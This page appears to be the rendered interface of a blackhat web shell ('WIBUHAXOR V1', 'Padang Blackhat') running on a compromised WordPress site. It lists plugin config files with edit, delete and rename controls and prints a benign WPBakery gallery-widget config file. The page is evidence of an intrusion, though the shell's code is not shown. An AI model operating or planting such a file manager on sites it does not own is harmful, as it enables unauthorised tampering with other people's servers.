-
WIBUHAX0R1337
-
/
home
/
cideo
/
www
/
wp-contentVIp
/
plugins
/
js_composer
/
config
/
content
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
shortcode-vc-column-text.php
1.097KB
Edit File
Delete File
Rename
shortcode-vc-custom-heading.php
0.129KB
Edit File
Delete File
Rename
shortcode-vc-empty-space.php
0.999KB
Edit File
Delete File
Rename
shortcode-vc-flickr.php
2.126KB
Edit File
Delete File
Rename
shortcode-vc-gallery.php
4.826KB
Edit File
Delete File
Rename
shortcode-vc-gmaps.php
2.027KB
Edit File
Delete File
Rename
shortcode-vc-icon.php
0.073KB
Edit File
Delete File
Rename
shortcode-vc-images-carousel.php
4.87KB
Edit File
Delete File
Rename
shortcode-vc-line-chart.php
4.295KB
Edit File
Delete File
Rename
shortcode-vc-message.php
9.243KB
Edit File
Delete File
Rename
shortcode-vc-pie.php
2.376KB
Edit File
Delete File
Rename
shortcode-vc-posts-slider.php
5.922KB
Edit File
Delete File
Rename
shortcode-vc-progress-bar.php
5.39KB
Edit File
Delete File
Rename
shortcode-vc-round-chart.php
4.931KB
Edit File
Delete File
Rename
shortcode-vc-separator.php
2.469KB
Edit File
Delete File
Rename
shortcode-vc-single-image.php
6.747KB
Edit File
Delete File
Rename
shortcode-vc-text-separator.php
4.218KB
Edit File
Delete File
Rename
shortcode-vc-toggle.php
4.356KB
Edit File
Delete File
Rename
shortcode-vc-video.php
2.382KB
Edit File
Delete File
Rename
vc-custom-heading-element.php
3.289KB
Edit File
Delete File
Rename
vc-icon-element.php
7.645KB
Edit File
Delete File
Rename
<?php return array( 'name' => __( 'Image Gallery', 'js_composer' ), 'base' => 'vc_gallery', 'icon' => 'icon-wpb-images-stack', 'category' => __( 'Content', 'js_composer' ), 'description' => __( 'Responsive image gallery', 'js_composer' ), 'params' => array( array( 'type' => 'textfield', 'heading' => __( 'Widget title', 'js_composer' ), 'param_name' => 'title', 'description' => __( 'Enter text used as widget title (Note: located above content element).', 'js_composer' ), ), array( 'type' => 'dropdown', 'heading' => __( 'Gallery type', 'js_composer' ), 'param_name' => 'type', 'value' => array( __( 'Flex slider fade', 'js_composer' ) => 'flexslider_fade', __( 'Flex slider slide', 'js_composer' ) => 'flexslider_slide', __( 'Nivo slider', 'js_composer' ) => 'nivo', __( 'Image grid', 'js_composer' ) => 'image_grid', ), 'description' => __( 'Select gallery type.', 'js_composer' ), ), array( 'type' => 'dropdown', 'heading' => __( 'Auto rotate', 'js_composer' ), 'param_name' => 'interval', 'value' => array( 3, 5, 10, 15, __( 'Disable', 'js_composer' ) => 0, ), 'description' => __( 'Auto rotate slides each X seconds.', 'js_composer' ), 'dependency' => array( 'element' => 'type', 'value' => array( 'flexslider_fade', 'flexslider_slide', 'nivo', ), ), ), array( 'type' => 'dropdown', 'heading' => __( 'Image source', 'js_composer' ), 'param_name' => 'source', 'value' => array( __( 'Media library', 'js_composer' ) => 'media_library', __( 'External links', 'js_composer' ) => 'external_link', ), 'std' => 'media_library', 'description' => __( 'Select image source.', 'js_composer' ), ), array( 'type' => 'attach_images', 'heading' => __( 'Images', 'js_composer' ), 'param_name' => 'images', 'value' => '', 'description' => __( 'Select images from media library.', 'js_composer' ), 'dependency' => array( 'element' => 'source', 'value' => 'media_library', ), ), array( 'type' => 'exploded_textarea_safe', 'heading' => __( 'External links', 'js_composer' ), 'param_name' => 'custom_srcs', 'description' => __( 'Enter external link for each gallery image (Note: divide links with linebreaks (Enter)).', 'js_composer' ), 'dependency' => array( 'element' => 'source', 'value' => 'external_link', ), ), array( 'type' => 'textfield', 'heading' => __( 'Image size', 'js_composer' ), 'param_name' => 'img_size', 'value' => 'thumbnail', 'description' => __( 'Enter image size. Example: thumbnail, medium, large, full or other sizes defined by current theme. Alternatively enter image size in pixels: 200x100 (Width x Height). Leave empty to use "thumbnail" size.', 'js_composer' ), 'dependency' => array( 'element' => 'source', 'value' => 'media_library', ), ), array( 'type' => 'textfield', 'heading' => __( 'Image size', 'js_composer' ), 'param_name' => 'external_img_size', 'value' => '', 'description' => __( 'Enter image size in pixels. Example: 200x100 (Width x Height).', 'js_composer' ), 'dependency' => array( 'element' => 'source', 'value' => 'external_link', ), ), array( 'type' => 'dropdown', 'heading' => __( 'On click action', 'js_composer' ), 'param_name' => 'onclick', 'value' => array( __( 'None', 'js_composer' ) => '', __( 'Link to large image', 'js_composer' ) => 'img_link_large', __( 'Open prettyPhoto', 'js_composer' ) => 'link_image', __( 'Open custom link', 'js_composer' ) => 'custom_link', ), 'description' => __( 'Select action for click action.', 'js_composer' ), 'std' => 'link_image', ), array( 'type' => 'exploded_textarea_safe', 'heading' => __( 'Custom links', 'js_composer' ), 'param_name' => 'custom_links', 'description' => __( 'Enter links for each slide (Note: divide links with linebreaks (Enter)).', 'js_composer' ), 'dependency' => array( 'element' => 'onclick', 'value' => array( 'custom_link' ), ), ), array( 'type' => 'dropdown', 'heading' => __( 'Custom link target', 'js_composer' ), 'param_name' => 'custom_links_target', 'description' => __( 'Select where to open custom links.', 'js_composer' ), 'dependency' => array( 'element' => 'onclick', 'value' => array( 'custom_link', 'img_link_large', ), ), 'value' => vc_target_param_list(), ), array( 'type' => 'textfield', 'heading' => __( 'Extra class name', 'js_composer' ), 'param_name' => 'el_class', 'description' => __( 'Style particular content element differently - add a class name and refer to it in custom CSS.', 'js_composer' ), ), array( 'type' => 'css_editor', 'heading' => __( 'CSS box', 'js_composer' ), 'param_name' => 'css', 'group' => __( 'Design Options', 'js_composer' ), ), ), );
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat